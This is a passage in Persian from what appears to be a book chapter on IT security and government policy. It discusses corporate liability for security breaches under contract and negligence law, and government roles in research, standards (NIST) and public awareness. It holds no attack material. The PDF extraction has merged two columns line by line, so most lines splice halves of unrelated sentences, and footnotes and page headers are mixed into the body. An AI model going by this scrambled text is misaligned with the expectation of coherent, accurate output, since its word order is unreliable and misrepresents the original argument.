‫ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻧﻴـﺰ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻧﺠﺎﻡ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﻛﺖ ﻣﻴـﺎﻧﻲ‬ ‫ﺍﻟﺰﺍﻣﻲ ﺩﺍﻧﺴﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻃﺒﻖ ﻗﺎﻧﻮﻥ ﻋﺎﻡ ﺷﺮﻛﺘﻬﺎ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﺷﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺣﻤﻠﻪ ﺍﻱ ﺗﻮﺳﻂ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ‬ ‫ﺗﺠﺎﺭﻱ ﻋﻤـﻮﻣﻲ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻏﻴﺮﻭﺍﺑـﺴﺘﻪ ﺗﺤـﺖ‬
‫ﺷﺮﻛﺖ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎ ﺍﺛﺒـﺎﺕ ﺍﻳـﻦ‬ ‫ﺣﺴﺎﺑﺮﺳﻲ ﻣﺎﻟﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻣﺘﻮﺟـﻪ‬
‫ﻣﻮﺿﻮﻉ ﺷﺮﻛﺖ ﺭﺍ ﻣﺘﻬﻢ ﺑﻪ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻦ ﺿﻮﺍﺑﻂ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬ ‫ﺷﻮﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﻨﺎﺩ ﻣﺎﻟﻲ ﺷﺮﻛﺖ ﺭﺍ ﺗﻬﺪﻳﺪ‬
‫ﻻﺯﻡ ﺍﺳﺘﺨﺪﺍﻣﻲ ﻳﺎ ﻧﻈﺎﺭﺗﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻨـﺪ‪ ،‬ﺷﺎﺧـﺼﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﻧﻴـﺰ ﺑـﻪ ﺣﻴﻄـﺔ‬
‫ﺣﺴﺎﺑﺮﺳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ‪،‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫـﻢ ‪ -‬ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﺍﻳﺠـﺎﺩ‬
‫ﻣﻮﺍﺭﺩ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤـﺪﻱ ﻣﻮﺟـﻮﺩ ﻫـﺴﺘﻨﺪ ‪ -‬ﺍﻳـﻦ ﻧـﻮﻉ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ ﺗﻬﻴﻪ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻣﻨﻴﺖ‬
‫ﺷﺒﻜﻪ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﻧﻨﻤﻮﺩﻩ ﺍﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ‬
‫ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭﺩﺍﺩ‬
‫ﺷــﺎﻳﺪ ﺗﻨﻬــﺎ ﮔﺬﺷــﺖ ﺯﻣــﺎﻥ ﺑﺘﻮﺍﻧــﺪ ﺗﺌﻮﺭﻳﻬــﺎﻱ ﻗــﺪﻳﻤﻲ‬
‫ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻨـﺪ‪ .‬ﺩﺭ‬ ‫ﻃﺒــﻖ ﻗــﺎﻧﻮﻥ ﻗــﺮﺍﺭﺩﺍﺩ‪ ،‬ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ ﺩﺳﺘﺮﺳــﻲ‬
‫ﺁﻥ ﺯﻣﺎﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ‬ ‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻳﺎ ﺁﺳﻴﺐ ﻧﺎﺷﻲ ﺍﺯ ﻧﻘـﺎﺋﺺ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﻭ ﺟﺎﻣﻌﺔ ﺗﺠـﺎﺭﻱ ﺩﺭﻳﺎﺑﻨـﺪ‪ ،‬ﻭ‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ‪ .‬ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ‪ ،‬ﺷﺮﻛﺘﻲ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳـﻂ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺧـﻮﺩ‪-‬ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ‬ ‫ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋﻼﻡ ﻣﻲﺩﺍﺭﺩ "ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻳﻤـﻦ‬
‫ﺍﺻﻼﺡ ﺷﻮﻧﺪ‪.‬‬ ‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ"‪ ،‬ﺍﻳﻨﮕﻮﻧﻪ ﻓﺮﺽ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑـﺎ ﻣـﺸﺘﺮﻱ ﺧـﻮﺩ‬
‫ﻭﺍﺭﺩ ﻳﻚ ﺗﻮﺍﻓﻖ ﺩﻭﻃﺮﻓﻪ ﺷﺪﻩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻣﻮﻇﻒ ﺑﻪ ﺗﻌﺎﻣﻞ ﺑـﺎ‬
‫ﻣــﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﺤﻴﻄــﻲ ﺍﻣــﻦ ﻣــﻲﺑﺎﺷــﺪ‪ .‬ﺩﺭ ﭼﻨــﻴﻦ ﺣــﺎﻟﺘﻲ‪،‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺑﺎ ﺣﻤـﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻓﺘﺪ ﻣﺸﺘﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ ﻛﻨـﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺣﺴﺐ ﻗﺮﺍﺭﺩﺍﺩ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ‬
‫ﺧﺪﻣﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻧﻴـﺰ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺍﺛﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ٦٩‬ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﻭ ﺍﺭﺍﺋﻪ‬
‫ﺳﺮﻭﻳﺲ ﺑﺎﺯ ﺑﻤﺎﻧﺪ‪ ،‬ﺷﺮﻛﺖ ﺩﺭ ﻣﻌﺮﺽ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ‬
‫ﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬

‫ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤﺪﻱ‬


‫ﺍﺯ ﻧﻈﺮ ﺣﻘﻮﻗﻲ‪ ،‬ﻣﻔﻬﻮﻡ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤﺪﻱ )ﻣﺴﺌﻮﻟﻴﺖ ﻣﺪﻧﻲ ﺩﺭ ﻗﺒـﺎﻝ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳﻬﻮﻱ( ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺁﺳﻴﺒﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜـﺎﺭ‬
‫ﻣﻲﺭﻭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﺎﻧﻮﻥ ﺳﻨﺘﻲ ﺟﺮﺍﺋﻢ ﺑﺮﺍﻱ‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷـﺮﻛﺖ ﺍﻗـﺪﺍﻣﺎﺕ ﻣﻨﻄﻘـﻲ ﺑـﺮﺍﻱ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ‬
‫ﭘﻴﺶ ﻧﮕﻴﺮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑـﺎ ﺍﺩﻋـﺎﻱ‬

‫‪69‬‬ ‫‪Denial of Service‬‬


‫‪٢٤٥‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺑﻬـﺮﻩ ﻭﺭﻱ‪ ،‬ﺗـﺴﻬﻴﻞ ﺗﺠـﺎﺭﺕ‪ ،‬ﻭ ﺑﻬﺒـﻮﺩ ﻛﻴﻔﻴـﺖ‬


‫ﺯﻧﺪﮔﻲ ﺍﺳﺖ‪.‬‬
‫ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ‪ NIST‬ﺑــﺮﺍﻱ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ ﻳــﻚ‬
‫ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺗﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻳﺮ ﻣﻲﭘﺮﺩﺍﺯﺩ‪:‬‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺍﻓــﺰﺍﻳﺶ ﺁﮔــﺎﻫﻲ ﺩﺭﺑــﺎﺭﺓ ﺧﻄــﺮﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ‪،‬‬ ‫•‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎﻱ ﺣﻔﺎﻇﺘﻲ؛‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ‬
‫ﺗﺤﻘﻴﻖ‪ ،‬ﻣﻄﺎﻟﻌﻪ ﻭ ﺍﺭﺍﺋﻪ ﺗﻮﺻـﻴﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ‬ ‫•‬ ‫ﺩﻭﻟﺘﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺗﺨـﺎﺫ ﻛﻨﻨـﺪ ﻛـﻪ‬
‫ﻣﻌﺮﺽ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ؛‬ ‫ﺑﻄﻮﺭ ﺧﺎﺹ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺪ ﻧﻈـﺮ‬
‫ﺍﻳﺠﺎﺩ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫•‬ ‫ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷـﺎﻣﻞ ﺗﻄﺒﻴـﻖ ﺳـﺎﻳﺮ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺣﺴﺎﺱ ﺩﻭﻟﺖ؛‬ ‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭ ﺷﺪﻥ ﺑـﺎ ﻣـﺴﺎﺋﻞ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺑﺸﻮﺩ‪ .‬ﺗﺠﺮﺑﻪ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻳـﻚ ﺷـﺮﻁ ﻛﻠﻴـﺪﻱ‬
‫ﺗﻬﻴــﺔ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻣﻌﻴــﺎﺭﻫــﺎ‪ ،‬ﺁﺯﻣﻮﻧﻬــﺎ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ‬ ‫•‬
‫ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﻱ ﻣﻮﻓــﻖ ‪ ،‬ﻣﺤــﺪﻭﺩ ﻛــﺮﺩﻥ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﺷــﺮﺍﻳﻂ ﻭ‬
‫ﺍﻋﺘﺒﺎﺭﺳﻨﺠﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ‪ ،‬ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻲ ﺍﻣﻨﻴـﺖ‬ ‫ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺧﺎﺹ ﺍﺳﺖ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﮔـﺮﻓﺘﻦ ﺍﻳـﻦ ﻧﻜﺘـﻪ‪ ،‬ﺩﻭﻟﺘﻬـﺎ‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺳﺮﻭﻳﺴﻬﺎ؛‬ ‫ﻭﻇﺎﻳﻒ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﻭﻥ ﻧﮕﺎﻩ ﺧـﺎﺹ ﺑـﻪ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ‬
‫ﺗﺄﻣﻴﻦ ﺣﺪﺍﻗﻞ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫•‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺗﻌﻴﻴﻦ ﻧﻤﻮﺩﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺩﻭﻟﺖ؛‬ ‫ﺩﺭ ﺭﻫﻨﻤﻮﺩ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩ‪ ٧٠‬ﺑﺮ ﻋﻬـﺪﺓ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎ ﮔﺬﺍﺷـﺘﻪ‬
‫ﺍﺭﺍﺋﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻃﺮﺍﺣﻲ‪،‬‬ ‫•‬
‫ﺷﺪﻩ ﻭ ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺟـﺰﺀ ﺛـﺎﺑﺘﻲ ﺍﺯ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ‪ ،‬ﻣﺪﻳﺮﻳﺖ‪ ،‬ﻭ ﻧﻴﺰ ﻋﻤﻠﻴﺎﺕ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ؛‬ ‫ﻧﻴﺎﺯﻫﺎﻱ ﺑﺨﺶ ﻣﺎﻟﻲ ﻗﻠﻤﺪﺍﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﻃـﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ‪،‬‬
‫ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﺩﺭ ﺍﻧﺘﺸﺎﺭ ﻋﻤﻮﻣﻲ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳـﺪ ﺑـﻪ‬ ‫ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺻﻨﻌﺖ ﺑﻬﺪﺍﺷـﺖ ﺭﺍ ﺑﻄـﻮﺭ ﺷـﻔﺎﻑ ﺗﻌﺮﻳـﻒ‬
‫ﻧﻮﻋﻲ ﺑﺮ ﻣﻴﻞ ﺧﻮﺩ ﺑﻪ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻏﻠﺒﻪ ﻛﻨﻨﺪ‪ .‬ﻳﻚ ﻣﺜﺎﻝ ﺧﻮﺏ‬ ‫ﻧﻤﻮﺩﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﻄﻮﺭ ﻣﻔﺼﻞ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ‬
‫ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ‪ ،‬ﺳـﺎﺯﻣﺎﻥ ﻓـﻮﻕ ﺳـﺮﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ‬ ‫ﺍﺑﺘﺪﺍ ﺑﻪ ﺑﺮﺧﻲ ﻧﻘﺸﻬﺎﻱ ﻣﻬﻢ ﺩﻭﻟﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﻣﺘﺤﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﻫﻤﮕﻲ ﻏﻴﺮ ﺍﺯ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻫﻤﮕﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ‪ -‬ﺩﻭﻟﺖ ﻫﻤﭽﻨﻴﻦ ﻳﻜـﻲ ﺍﺯ ﺗـﺼﻤﻴﻢﮔﻴﺮﻧـﺪﮔﺎﻥ‬ ‫ﻧﻘﺸﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ‬
‫ﻣﻬــﻢ ﺩﺭ ﺗﻌﻴــﻴﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺍﺳــﺖ‪.‬‬ ‫ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑـﺮ ﺍﻣﻨﻴـﺖ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ‪ ،‬ﺩﺍﻭﻃﻠﺒﺎﻧﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ‬
‫ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﺘﺨﺼﺼﺎﻥ ﺩﻭﻟﺘﻲ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺍﻳﻦ‬ ‫ﻫﻤﻪ ﺍﺯ ﻧﻮﻉ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻛﻪ ﺷـﺎﻳﺪ‬
‫ﺯﻣﻴﻨﻪ ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ‪ -‬ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺩﻭﻟـﺖ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬ ‫ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﻫﻢ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﺣﻤﺎﻳﺖ ﻛﻨﺪ‪.‬‬
‫ﺗﺤﻘﻴﻖ ‪ -‬ﻳﻜﻲ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ‪ ،‬ﺗـﺄﻣﻴﻦ ﺳـﺮﻣﺎﻳﻪ ﻭ‬
‫ﺁﮔﺎﻫﻲ‪ ،‬ﺁﻣﻮﺯﺵ ﻭ ﻇﺮﻓﻴﺖ ﺳﺎﺯﻱ‪ :‬ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘﺸﻬﺎﻱ‬ ‫ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑـﺎﺭﻩ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺳـﺖ‪ .‬ﻣﺆﺳـﺴﻪ ﻣﻠـﻲ‬
‫ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ‪ ،‬ﺁﻣﻮﺯﺵ ﻋﻤـﻮﻣﻲ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺑﺨـﺸﻬﺎﻱ‬ ‫ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨــﺎﻭﺭﻱ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ )‪ ٧١(NIST‬ﺳــﺎﺯﻣﺎﻥ‬
